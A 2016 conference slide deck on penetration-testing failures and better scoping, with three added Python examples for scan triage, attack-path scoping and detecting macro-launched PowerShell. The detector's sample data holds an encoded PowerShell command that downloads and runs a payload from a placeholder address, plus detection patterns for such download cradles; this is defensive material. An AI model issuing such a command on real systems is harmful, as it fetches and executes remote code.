White Hats and Ethical Hacking: What You’ve Been Doing Wrong
FocusOn CyberSecurity, 30 March 2016
Overview
• Vulnerability assessments and penetration testing
• What goes wrong
• The future of penetration testing
© 2016 Digital Defence. All rights reserved. This document is for informational purposes only. Digital Defence makes no warranties, express or implied, in this document.
Show of Hands …
• Have you ever requested a penetration test and been disappointed with the results?
• Have you ever completed a penetration test for a customer and felt that it “went nowhere”?
Vulnerability Assessments and Penetration Testing
Vulnerability Assessments
• Tool-based
• Automated, signature-based scans for known vulnerabilities
• Follows a defined methodology
• Catches roughly 60% of vulnerabilities
• High false-positive rates; the value comes from interpreting the results and from root-cause analysis
Penetration Testing
• Intelligence-based testing: human intelligence and experience drive the results
• Identifies security weaknesses and vulnerabilities
• The goal is to exploit those weaknesses
• Victory conditions:
  – Compromise a system; launch successful attacks
  – Gain root access
  – Even one compromise is a victory
Vulnerability Assessments and Penetration Testing
What Goes Wrong?
Customer Quote
“I’m only doing this testing because it’s a requirement for PCI.
I find it’s too expensive, you guys have a license to print money!
Sure, you found lots of little vulnerabilities, but I knew about those before you even got here. For the money I’m paying you, I expect you to have root access within an hour. Come on – impress me!”
Customer Quote
“We’ve just started doing a security review so we can qualify for new work from our client.
I’d like you to do a penetration test against my network.
We’ll knock that off while the rest of the team works on the other stuff like writing policies …”
Customer Quote
“We want you to test our production network of 800 (+) servers. Some of the servers are flaky, so make sure that you don’t crash them.
We need the testing to be completed by the end of the week (reconciliation time is coming).
Because we do financial services, you can only test at night, after midnight, and end testing by 6:00 AM.”
Customer Quote
“You can only bid on this project if the testers have actual experience in testing _______ plants of this type, and have demonstrated that they can write their own protocols to test the Zigbee radio systems.
The following will be out of scope: physical security, social engineering (including USB keys, hostile phishing emails, and impersonating the FedEx guy), insider attacks, attacks against the NT4 servers we know are still there ….”
Consultant and Client
Consultant: “Here are the test results”
Client: “Thanks, I’ll make sure that IT against them when we’re done the review”
Consultant: “I couldn’t help noticing that most of the report is the stuff that we found last year … and the year before that … and the year before that one ….”
Client: “Yeah, well … we’ve been kinda busy”
Summary of Findings
• Lack of executive support
• Misalignment between what the customer will spend (and the liability they will accept) and the actual risk
• Customers don’t understand the impact of testing on their network
• Unrealistic scope imposed on the tester (too many hosts, too little time, too many constraints)
• Scope does not reflect reality: the real adversary type and their attack methodologies are excluded
• No accountability for responding to results
• No resolution tracking or change control
Effective Vulnerability Scanning
• Credentialed scans
• Continuous scanning, not a once-a-year event
• Use at least two different scanning tools
• Feed results into the trouble-ticket system
• Accountability for remediation
• Verify remediation (rescan; don’t just close the ticket)
• Scan devices too (printers, power bars, etc.)
• Build scanning into operational programs
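The triage that the two scanning slides describe (interpreting raw scanner output, running two tools, feeding a ticket system, tracking repeats and verifying remediation) as an added worked example; this is not code from the presentation or from Digital Defence. The scanner records, check names, hosts and owner map are constructed and hypothetical, and a real scanner export would need its own parser in front of `merge()`.

```python
"""Triage merged vulnerability-scan output and turn it into trackable tickets.

Added example (not from the presentation). Scanner export formats differ, so the
records below use a constructed, tool-neutral shape; the check names, hosts and
owner map are hypothetical.
"""
from dataclasses import dataclass, field

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

# Constructed results from two hypothetical scanners run against the same hosts.
SCAN_A = [
    {"host": "10.0.0.5", "check": "smb-signing-disabled", "severity": "medium", "credentialed": True},
    {"host": "10.0.0.5", "check": "openssh-outdated", "severity": "high", "credentialed": True},
    {"host": "10.0.0.9", "check": "weak-tls-cipher", "severity": "medium", "credentialed": False},
]
SCAN_B = [
    {"host": "10.0.0.5", "check": "smb-signing-disabled", "severity": "high", "credentialed": False},
    {"host": "10.0.0.9", "check": "default-snmp-community", "severity": "high", "credentialed": False},
]
# Tickets still open from the previous cycle: (host, check) -> scans it has stayed open.
PREVIOUS_OPEN = {("10.0.0.5", "smb-signing-disabled"): 2, ("10.0.0.9", "telnet-enabled"): 1}
# Hypothetical asset-owner map: every ticket needs someone accountable.
OWNERS = {"10.0.0.5": "windows-team", "10.0.0.9": "network-team"}


@dataclass
class Finding:
    host: str
    check: str
    severity: str
    credentialed: bool
    sources: set = field(default_factory=set)


def merge(*scans):
    """Collapse per-tool result lists into one Finding per (host, check).

    Severity is the highest any tool reported; a finding counts as credentialed
    if any tool confirmed it from inside the host.
    """
    merged = {}
    for tool, results in scans:
        for r in results:
            key = (r["host"], r["check"])
            f = merged.setdefault(key, Finding(r["host"], r["check"], r["severity"], False))
            if SEVERITY_RANK[r["severity"]] > SEVERITY_RANK[f.severity]:
                f.severity = r["severity"]
            f.credentialed = f.credentialed or r["credentialed"]
            f.sources.add(tool)
    return merged


def confidence(finding):
    """Two independent tools agreeing, or a credentialed check, is strong evidence;
    an unauthenticated hit from a single tool is where the false positives live."""
    if len(finding.sources) >= 2:
        return "confirmed"
    if finding.credentialed:
        return "likely"
    return "verify"


def reconcile(merged, open_tickets):
    """Split this cycle's findings into new, repeat and apparently resolved."""
    current, previous = set(merged), set(open_tickets)
    return current - previous, current & previous, previous - current


def build_tickets(merged, open_tickets, owners):
    _, repeat, resolved = reconcile(merged, open_tickets)
    tickets = []
    for key, f in sorted(merged.items()):
        ticket = {
            "host": f.host, "check": f.check, "severity": f.severity,
            "confidence": confidence(f), "owner": owners.get(f.host, "unassigned"),
            "status": "repeat" if key in repeat else "new",
        }
        if key in repeat:  # the "same findings as last year" problem, made visible
            ticket["age_scans"] = open_tickets[key] + 1
        tickets.append(ticket)
    # A finding that vanished is not proof of remediation (host down, missed scan
    # window): keep the ticket open until someone verifies the fix with a rescan.
    for host, check in sorted(resolved):
        tickets.append({"host": host, "check": check, "status": "verify-remediation",
                        "owner": owners.get(host, "unassigned")})
    return tickets


def run():
    merged = merge(("scanner-a", SCAN_A), ("scanner-b", SCAN_B))
    return build_tickets(merged, PREVIOUS_OPEN, OWNERS)


if __name__ == "__main__":
    for ticket in run():
        print(ticket)
```

The `age_scans` counter is what turns the consultant-and-client exchange above into a metric: a finding that has been open for three scan cycles is an accountability problem, not a scanning problem.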
Effective Penetration Testing
• Define the goal: why are you testing?
• Align testing with risk and with documented security policies
• Threat modelling
• In testing, follow the (critical) data
• Skilled testers + good reports = win
• Monitor the test while it runs
• Measure progress from test to test
• Don’t rely on a single tester
The Future of Penetration Testing
Change Your Testing Methodology 1
• Risk-based approach: what data are you trying to protect?
• That data defines the tester’s goal
  – It’s not about getting root; it’s about confirming that you’ve protected the most important corporate data
  – Scoping should allow both physical and logical tests
  – Scope may include the supply chain and third parties
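A worked example of scoping from the data outward, as the risk-based approach on this slide and the “follow the critical data” point on the Effective Penetration Testing slide both call for; added here, not code from the presentation or from Digital Defence. The environment, system names and the attack vector on each edge are constructed and hypothetical. The tester’s objectives come out as routes to each critical data store, and restricting the allowed vectors shows which routes an out-of-scope clause (no physical, no social engineering) removes from the test but not from the adversary.

```python
"""Derive penetration-test objectives from the data being protected.

Added example (not from the presentation). The environment is constructed and
hypothetical: nodes are systems, edges are ways an attacker who controls the
source could reach the target, tagged with the vector the tester would need in
scope to use that edge.
"""
from collections import defaultdict

EDGES = [
    ("internet", "web-portal", "network"),
    ("internet", "vpn-gateway", "network"),
    ("internet", "reception-kiosk", "physical"),
    ("web-portal", "app-server", "network"),
    ("vpn-gateway", "staff-laptop", "phished-credentials"),
    ("reception-kiosk", "office-lan", "network"),
    ("staff-laptop", "office-lan", "network"),
    ("staff-laptop", "file-share", "network"),
    ("office-lan", "file-share", "network"),
    ("office-lan", "backup-server", "network"),
    ("app-server", "customer-db", "network"),
    ("backup-server", "customer-db", "shared-credentials"),
    ("backup-server", "hr-db", "shared-credentials"),
]

# The data classification drives the goals, not the host list.
CRITICAL_DATA = {
    "customer-db": "customer card and account data",
    "hr-db": "payroll and employee records",
}


def build_graph(edges):
    graph = defaultdict(list)
    for src, dst, vector in edges:
        graph[src].append((dst, vector))
    return graph


def attack_paths(graph, start, target, allowed=None):
    """Every simple path start -> target, shortest first.

    allowed restricts the vectors the test may use; None means everything is in
    scope. Returns (nodes, vectors) pairs.
    """
    found = []

    def walk(node, nodes, vectors):
        if node == target:
            found.append((nodes, vectors))
            return
        for nxt, vector in graph.get(node, []):
            if nxt in nodes:  # simple paths only
                continue
            if allowed is not None and vector not in allowed:
                continue
            walk(nxt, nodes + [nxt], vectors + [vector])

    walk(start, [start], [])
    found.sort(key=lambda p: len(p[0]))
    return found


def scope_objectives(edges, data_stores, start="internet", allowed=None):
    """For each critical data store: the routes the tester should try and the
    vectors the scope must permit for those routes to be testable at all."""
    graph = build_graph(edges)
    objectives = {}
    for store, label in data_stores.items():
        paths = attack_paths(graph, start, store, allowed)
        objectives[store] = {
            "data": label,
            "paths": [nodes for nodes, _ in paths],
            "vectors_needed": {v for _, vectors in paths for v in vectors},
        }
    return objectives


if __name__ == "__main__":
    full = scope_objectives(EDGES, CRITICAL_DATA)
    # Same question with physical access and social engineering excluded, as in
    # the customer quote earlier in the deck.
    narrowed = scope_objectives(EDGES, CRITICAL_DATA, allowed={"network"})
    for store in CRITICAL_DATA:
        print(store, "full-scope routes:", len(full[store]["paths"]),
              "network-only routes:", len(narrowed[store]["paths"]),
              "vectors needed:", sorted(full[store]["vectors_needed"]))
```

In this constructed environment the payroll database is reachable only through the kiosk or a phished VPN user plus a shared backup credential, so a network-only scope cannot test it at all; the scoping conversation should start from that output rather than from a server count.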
Change Your Testing Methodology - 2
• What is the adversary doing? What “rules” do they obey?
• What is their attack methodology?
• If the attackers are using social engineering, are you training to counteract that?
• Train as you fight
Attack Methodologies You MUST Include
• Physical attacks against data systems (theft of devices, key loggers, “road apples”)
• Wireless and VoIP networks
• Hostile MS Word and Excel documents whose macros launch PowerShell
• APT simulations
• Exfiltration simulations
Change Your Testing Methodology - 3
• Blue Team: defenders
• Red Team: attackers, vulnerability scanners, penetration testers
• Purple Team = Blue + Red
• Meaningfully exercise the internal defences
• Doubles the value of a test (at least)
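An added example, not from the presentation or from Digital Defence, of the blue-side half of a purple-team exercise: detection logic for the hostile-document case listed under Attack Methodologies, run over constructed process-creation events. The event field names, hostnames, paths and the 198.51.100.7 address are hypothetical, and the one behaviour the code relies on is PowerShell’s own: `-EncodedCommand` (any unambiguous prefix, `-enc`, `-e`) carries a base64 string of the UTF-16LE command. When the red team fires the macro, the blue team should see both the parent/child pairing and the decoded command; if neither alert fires, that gap is the finding.

```python
"""Flag Office applications spawning script hosts, and decode -EncodedCommand.

Added example (not from the presentation). The events are constructed JSON
lines loosely shaped like process-creation telemetry (parent image, image,
command line); field names, hosts and the 198.51.100.7 address are hypothetical.
"""
import base64
import json
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)


def encode_ps(command):
    """How the -EncodedCommand argument is built: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded command, or None if there is no valid encoded argument."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event):
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    alerts = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        alerts.append(f"office-spawned-shell:{parent}->{image}")
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        alerts.append("encoded-powershell")  # admins use this too: weak on its own
        if CRADLE_RE.search(decoded):
            alerts.append("encoded-download-cradle")
    return {"host": event["Computer"], "decoded": decoded, "alerts": alerts}


def run_detection(lines):
    """Analyse one JSON event per line; returns one result dict per event."""
    return [analyse(json.loads(line)) for line in lines if line.strip()]


# Constructed sample events. Event 2 is what a macro-enabled document's payload
# typically looks like to telemetry; event 3 is an admin using -EncodedCommand
# legitimately, so encoding alone must not be the alert.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Computer": "ws01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": OFFICE + r"\WINWORD.EXE",
     "CommandLine": OFFICE + r"\WINWORD.EXE /n C:\Users\alice\report.docx"},
    {"Computer": "ws01", "ParentImage": OFFICE + r"\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage')")},
    {"Computer": "admin02", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + encode_ps(
         "Get-Service | Where-Object Status -eq Stopped")},
    {"Computer": "ws07", "ParentImage": OFFICE + r"\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c wscript.exe C:\Users\Public\update.vbs"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for result in run_detection(SAMPLE_LOG):
        print(result["host"], result["alerts"], result["decoded"])
```

The parent/child pairing is the high-value signal here; the decoded command is what lets the blue team tell the red team’s download cradle from the administrator’s maintenance script.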
Questions?
DigitalDefence (www.digitaldefence.ca)
• Specializes in penetration testing, incident response, data forensics
• Training provider
Robert W. Beggs, CISSP
• 15+ years experience in all aspects of data security
Contact Me
519-771-8808
https://ca.linkedin.com/in/robertbeggs